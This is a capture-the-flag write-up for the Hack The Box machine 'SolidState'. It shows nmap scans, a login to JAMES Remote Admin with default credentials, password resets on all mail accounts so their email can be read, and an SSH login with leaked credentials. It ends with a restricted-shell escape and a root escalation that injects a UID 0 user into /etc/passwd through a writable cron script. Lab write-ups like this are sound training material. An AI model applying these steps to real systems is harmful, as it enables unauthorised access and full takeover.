Content
Welcome to the SolidState writeup from HTB
tags:
Enumeration
Nmap
JAMES Remote Admin
Exploitation
Jail escape
Post exploitation
Enumeration
Pspy
Privilege escalation
Nmap
JAMES Remote Admin
Exploitation
Jail escape
Post exploitation
Enumeration
Pspy
Privilege escalation
Welcome to the SolidState writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
SolidState
tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:35 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Nmap done: 1 IP address (1 host up) scanned in 76.06 secondsNow that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:39 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.7 [10.10.14.7]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 92.98 ms 10.10.14.1
2 93.12 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.34 secondsJAMES Remote Admin
Googling we could find that the default credentials are root:root and still working!
# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connectionLet's see what users there are.
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadminExploitation
Well, we are going to change the password of all of them and read their emails.
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin resetLet's add the accounts to Thunderbird.
As we can see, John has a message in his inbox.
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
JamesAnd mindy has two messages.
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
JamesIn this one, we can find a creds!
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
JamesWe are going to connect by SSH with these credentials.
# ssh mindy@10.10.10.51
mindy@10.10.10.51’s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
............................................................................
............................................................................
-rbash: $'\r': command not found
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names
mindy@solidstate:~$Okay... we are jailed... Well let's get away 🤷🏻♂️
Jail escape
Running the command compgen -c we can see what commands we have available.
We can execute cat, give me the user's flag!
mindy@solidstate:~$ cat user.txt
CENSORED_FLAGTrying to escape with SSH... Done!
# ssh mindy@10.10.10.51 -t "bash"
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$Post exploitation
Enumeration
Pspy
2021/03/23 15:54:01 CMD: UID=0 PID=14955 | /bin/sh -c python /opt/tmp.pyWow! we can edit the script! Well, we are going to inject a user with root privileges in the file/etc/passwd.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.pyPrivilege escalation
Okay, let's add our code to the script.
#!/usr/bin/env python
import os
import sys
passwd = open('/etc/passwd', 'r').readlines()
if not any('x4v1l0k' in s for s in passwd):
output = open('/etc/passwd', 'a')
output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash')
output.close()
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()2021/03/23 16:06:01 CMD: UID=0 PID=932 | /bin/sh -c python /opt/tmp.py
2021/03/23 16:06:01 CMD: UID=0 PID=933 | python /opt/tmp.py Perfect, the script has been executed. We are going to check if the user has been injected and in that case to authenticate with it.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /etc/passwd | tail -n 1
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ su x4v1l0k
Password:
root@solidstate:/home/mindy# id
uid=0(root) gid=0(root) groups=0(root)
root@solidstate:/home/mindy# cat /root/root.txt
CENSORED_FLAGThat's all folks!
Can you help me share it?
